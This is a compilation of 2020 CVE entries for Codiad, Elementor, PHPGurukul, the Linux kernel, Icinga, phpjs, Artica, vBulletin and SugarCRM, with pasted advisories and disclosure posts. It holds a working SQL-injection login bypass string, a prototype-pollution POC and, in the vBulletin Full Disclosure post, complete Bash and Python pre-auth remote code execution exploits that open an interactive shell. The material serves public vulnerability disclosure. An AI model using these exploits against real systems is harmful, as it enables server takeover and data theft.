** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** A Cross Side Request Forgery (CSRF) vulnerability was found in Codiad v1.7.8 and later. The request to download a plugin from the marketplace is only available to admin users and it isn't CSRF protected in components/market/controller.php. This might cause admins to make a vulnerable request without them knowing and result in remote code execution. NOTE: the vendor states "Codiad is no longer under active maintenance by core contributors."

**Codiad Web IDE**

Codiad is a web-based IDE framework with a small footprint and minimal requirements.

Codiad was built with simplicity in mind, allowing for fast, interactive development without the massive overhead of some of the larger desktop editors. That being said even users of IDE's such as Eclipse, NetBeans and Aptana are finding Codiad's simplicity to be a huge benefit. While simplicity was key, we didn't skimp on features and have a team of dedicated developer actively adding more.

For more information on the project please check out the **check out the Wiki** or **the Codiad Website**

**Unmaintained Status**

Given its age and number of viable alternatives now available, Codiad is no longer under active maintenance by core contributors. You may use the issues for seeking community help on any ongoing issues, however, the code maintained in this repository is unlikely to be updated.

Distributed under the MIT-Style License. See LICENSE.txt file for more information.

CVE-2020-14043: Codiad/README.md at master · Codiad/Codiad

Elementor 2.9.5 and below WordPress plugin allows authenticated users to activate its safe mode feature. This can be exploited to disable all security plugins on the blog.

Elementor, a popular WordPress plugin installed on 4+ million websites, fixed a high severity vulnerability affecting version 2.9.5 and below. Any authenticated user could enable its Safe Mode feature allowing everyone, logged-in or not, to interact with it and to disable security plugins installed on the website such as firewall, antispam, two-factor authentication or captcha plugins for instance.

Elementor has a Safe Mode feature that is described as “a safe environment that isolates Elementor and WordPress from the themes and plugins that might be causing the error”. It can be enabled by the administrator from the plugin “Tools” page:

The fact that the editor can be loaded without loading any other plugin and the theme is certainly interesting from a developer’s point of view but, because Elementor is accessible to low-privileged users too, it sounds even more interesting from a hacker’s point of view. Let’s see how it works.

When enabling it, it calls the enable_safe_mode function from the “elementor/modules/safe-mode/module.php” script:

public function enable\_safe\_mode() {
   WP\_Filesystem();

   $this->update\_allowed\_plugins();

   if ( ! is\_dir( WPMU\_PLUGIN\_DIR ) ) {
      wp\_mkdir\_p( WPMU\_PLUGIN\_DIR );
      add\_option( 'elementor\_safe\_mode\_created\_mu\_dir', true );
   }

   if ( ! is\_dir( WPMU\_PLUGIN\_DIR ) ) {
      wp\_die( \_\_( 'Cannot enable Safe Mode', 'elementor' ) );
   }

   $results = copy\_dir( \_\_DIR\_\_ . '/mu-plugin/', WPMU\_PLUGIN\_DIR );

   if ( is\_wp\_error( $results ) ) {
      return false;
   }
}

It drops the “elementor/modules/safe-mode/mu-plugin/elementor-safe-mode.php” script into the WordPress “/mu-plugins/” folder:

class Safe\_Mode {

   const OPTION\_ENABLED = 'elementor\_safe\_mode';

   public function is\_enabled() {
      return get\_option( self::OPTION\_ENABLED );
   }

   public function is\_requested() {
      return ! empty( $\_REQUEST\['elementor-mode'\] ) && 'safe' === $\_REQUEST\['elementor-mode'\];
   }

   public function is\_editor() {
      return is\_admin() && isset( $\_GET\['action'\] ) && 'elementor' === $\_GET\['action'\];
   }

   public function is\_editor\_preview() {
      return isset( $\_GET\['elementor-preview'\] );
   }

   public function is\_editor\_ajax() {
      return is\_admin() && isset( $\_POST\['action'\] ) && 'elementor\_ajax' === $\_POST\['action'\];
   }

   public function add\_hooks() {
      add\_filter( 'pre\_option\_active\_plugins', function () {
         return get\_option( 'elementor\_safe\_mode\_allowed\_plugins' );
      } );

      add\_filter( 'pre\_option\_stylesheet', function () {
         return 'elementor-safe';
      } );

      add\_filter( 'pre\_option\_template', function () {
         return 'elementor-safe';
      } );

      add\_action( 'elementor/init', function () {
         do\_action( 'elementor/safe\_mode/init' );
      } );
   }
...
...
   public function \_\_construct() {
      add\_filter( 'plugin\_row\_meta', \[ $this, 'plugin\_row\_meta' \], 10, 4 );

      $enabled\_type = $this->is\_enabled();

      if ( ! $enabled\_type ) {
         return;
      }

      if ( ! $this->is\_requested() && 'global' !== $enabled\_type ) {
         return;
      }

      if ( ! $this->is\_editor() && ! $this->is\_editor\_preview() && ! $this->is\_editor\_ajax() ) {
         return;
      }

      $this->add\_hooks();
   }
}

new Safe\_Mode();

It uses the pre_option_ hook so that when WordPress queries the database to check which plugins, theme and style sheet must be loaded (active_plugins, template and stylesheet respectively), it returns that only Elementor should be activated. But this code is accessible to all users, logged-in or not, and can be triggered just by adding a specific query string to an HTTP request that will disable all other plugins while the request is being processed by WordPress.

In Elementor’s documentation, we can find some additional info about the Safe Mode activation:

In fact, there isn’t one but two ways to enable the Safe Mode: either from the settings page by an admin as described above or from the editor. The latter will only occur if there is a problem while it loads.  
With a contributor account, and after messing a bit with some of the HTML code, it wasn’t too difficult to force it to appear inside the editor screen:

When clicking the “Enable Safe Mode” button, it will send an AJAX request along with a security nonce to the handle_ajax_request function, which will forward it to ajax_enable_safe_mode and then will reach our enable_safe_mode function that will drop the MU plugin. None of these functions check user capabilities and they only rely on a nonce that is populated in the “elementor/core/common/app.php” script using the admin_enqueue_scripts hook.

add\_action( 'admin\_enqueue\_scripts', \[ $this, 'register\_scripts' \] );

Because the purpose of this hook is to enqueue scripts for all admin pages, the nonce is accessible to all authenticated users:

Therefore, any logged-in user, including a subscriber, can activate the Safe Mode and it can be triggered by anyone, authenticated or not, in the backend or frontend of WordPress. Attackers could use it for several purposes, for instance:

*   To send spam: they could disable a captcha and an antispam such as Akismet used to protect a form.
*   To bypass a firewall: if there were a vunerability in Elementor or WordPress, attackers could disable the firewall plugin and exploit it.
*   To attack the login page: they could disable any plugin used to protect it (two-factor authentication, brute-force protection, activity log, login notification etc) or to hide it.

Note that Elementor’s Role Manager won’t prevent the exploitation of this vulnerability.  
Additionally, if the Safe Mode can be enabled by any user in the backend, it can also be disabled because the disable_safe_mode action relies on the same AJAX function and security nonce.

**Demonstration**

_The following video has been edited to obscure some parts of the payload used to perform the attack._

This video demonstrates the exploitation of the Elementor Safe Mode privilege escalation vulnerability.  
1\. Attackers will use a subscriber account to enable the Safe Mode.  
2\. They will disable the login page captcha so that they can run a brute-force attack until they find the admin password.  
3\. They will disable the two-factor authentication security plugin in order to gain access to the administrator account.

**Recommendation**

Update ASAP if you have version 2.9.5 or below installed.  
If you are using our web application firewall for WordPress, NinjaFirewall WP Edition (free) and NinjaFirewall WP+ Edition (premium), you are protected against this vulnerability since March 10, 2020.

**Timeline**

The vulnerability was reported on March 10, 2020 and a new version 2.9.6 was released on March 12, 2020.

**Stay informed about the latest vulnerabilities**

*   Running WordPress? You can get email notifications about vulnerabilities in the plugins or themes installed on your blog.
*   On Twitter: @nintechnet

CVE-2020-20634: WordPress Elementor plugin fixed Safe Mode privilege escalation vulnerability.

PHPGurukul Vehicle Parking Management System 1.0 is vulnerable to Authentication Bypass via "Username: admin'# && Password: (Write Something)".

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2020-23936: Vulnerabilities/CVE-2020-23936 at master · enesozeser/Vulnerabilities

A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.

CVE-2020-14356: kernel NULL pointer dereference in __cgroup_bpf_run_filter_skb

Icinga Icinga Web2 2.0.0 through 2.6.4, 2.7.4 and 2.8.2 has a Directory Traversal vulnerability which allows an attacker to access arbitrary files that are readable by the process running Icinga Web 2. This issue is fixed in Icinga Web 2 in v2.6.4, v2.7.4 and v2.8.2.

CVE-2020-24368: icingaweb2/CHANGELOG.md at master · Icinga/icingaweb2

In the Linux kernel before 5.7.8, fs/nfsd/vfs.c (in the NFS server) can set incorrect permissions on new filesystem objects when the filesystem lacks ACL support, aka CID-22cf8419f131. This occurs because the current umask is not considered.

CVE-2020-24394: #962254 - NFSv4.2: umask not applied on filesystem without ACL support

All versions of phpjs are vulnerable to Prototype Pollution via parse_str.

**Prototype Pollution Affecting phpjs package, versions **\*****

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

*   Snyk ID **SNYK-JS-PHPJS-598681**
*   published **14 Aug 2020**
*   disclosed **14 Aug 2020**
*   credit **Beomjin Lee**

**How to fix?**

There is no fixed version for phpjs.

**Overview**

phpjs is a community built php binding in javascript.

Affected versions of this package are vulnerable to Prototype Pollution via parse_str.

**POC:**

    require('phpjs').parse_str("__proto__[polluted]=true",{});
    console.log(polluted) //true

CVE-2020-7700: Snyk Vulnerability Database | Snyk

Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.

CVE-2020-17506

vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.

**Full Disclosure mailing list archives**

_From_: Zenofex via Fulldisclosure <fulldisclosure () seclists org>  
_Date_: Sun, 9 Aug 2020 16:58:27 -0500  

vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code execution
vulnerability caused by incomplete patching of the previous
"CVE-2019-16759" RCE. This logic bug allows for a single pre-auth request
to execute PHP code on a target vBulletin forum.

More info can be found at:
https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

Exploits below.

Thank you,
Zenofex

BASH Exploit:

#!/bin/bash
#
# vBulletin (widget\_tabbedcontainer\_tab\_panel) 5.x 0day by @Zenofex
#
# Usage ./exploit <site> <shell-command>

# Urlencode cmd
CMD=\`echo $2|perl -MURI::Escape -ne 'chomp;print uri\_escape($\_),"\\n"'\`

# Send request
curl -s $1/ajax/render/widget\_tabbedcontainer\_tab\_panel -d
'subWidgets\[0\]\[template\]=widget\_php&subWidgets\[0\]\[config\]\[code\]=echo%20shell\_exec("'+$CMD+'");exit;'


Python Exploit:

#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget\_tabbedContainer\_tab\_panel RCE exploit by
@zenofex

import argparse
import requests
import sys

def run\_exploit(vb\_loc, shell\_cmd):
    post\_data = {'subWidgets\[0\]\[template\]' : 'widget\_php',
'subWidgets\[0\]\[config\]\[code\]' : "echo shell\_exec('%s'); exit;" % shell\_cmd}
    r = requests.post('%s/ajax/render/widget\_tabbedcontainer\_tab\_panel' %
vb\_loc, post\_data)
    return r.text

ap = argparse.ArgumentParser(description='vBulletin 5.x Ajax Widget
Template RCE')
ap.add\_argument('-l', '--location', required=True, help='Web address to
root of vB5 install.')
ARGS = ap.parse\_args()

while True:
    try:
        cmd = input("vBulletin5$ ")
        print(run\_exploit(ARGS.location, cmd))
    except KeyboardInterrupt:
        sys.exit("\\nClosing shell...")
    except Exception as e:
        sys.exit(str(e))

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Remote Code Execution 0day in vBulletin 5.x** _Zenofex via Fulldisclosure (Aug 11)_

CVE-2020-17496: Remote Code Execution 0day in vBulletin 5.x

SugarCRM before 10.1.0 (Q3 2020) allows SQL Injection.

**Full Disclosure mailing list archives**

_From_: Egidio Romano <n0b0d13s () gmail com>  
_Date_: Mon, 10 Aug 2020 16:31:29 +0200  

SugarCRM < 10.1.0 (Reports Export) SQL Injection Vulnerability

\*• Software Link:\*

https://www.sugarcrm.com

\*• Affected Versions:\*

All versions prior to 10.1.0 (Q3 2020).

\*• Vulnerability Description:\*

User input passed through the encoded “current\_post” parameter to
‘index.php’ (when “entryPoint” is set to “export” and “module” is set to
“Reports”) is not properly sanitized before being used to construct a SQL
query. This can be exploited by remote attackers to e.g. read sensitive
data from the database through e.g. time-based SQL Injection attacks.

\*• Proof of Concept:\*

http://karmainsecurity.com/pocs/CVE-2020-17373

\*• Solution:\*

Upgrade to version 10.1.0 (Q3 2020) or later.

\*• Disclosure Timeline:\*

\[05/02/2020\] – Vendor notified
\[06/02/2020\] – Automatic vendor response received
\[26/03/2020\] – Vendor contacted again; no response
\[17/04/2020\] – Vendor contacted again; no response
\[18/06/2020\] – Vendor notified about a 180-day disclosure deadline
\[03/08/2020\] – After around 180 days the vendor silently fix the issue
\[06/08/2020\] – CVE number assigned
\[10/08/2020\] – Public disclosure

\*• CVE Reference:\*

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2020-17373
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-17373\> to this
vulnerability.

\*• Credits:\*

Vulnerability discovered by Egidio Romano.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **SugarCRM < 10.1.0 (Reports Export) SQL Injection Vulnerability** _Egidio Romano (Aug 11)_

Tag

#php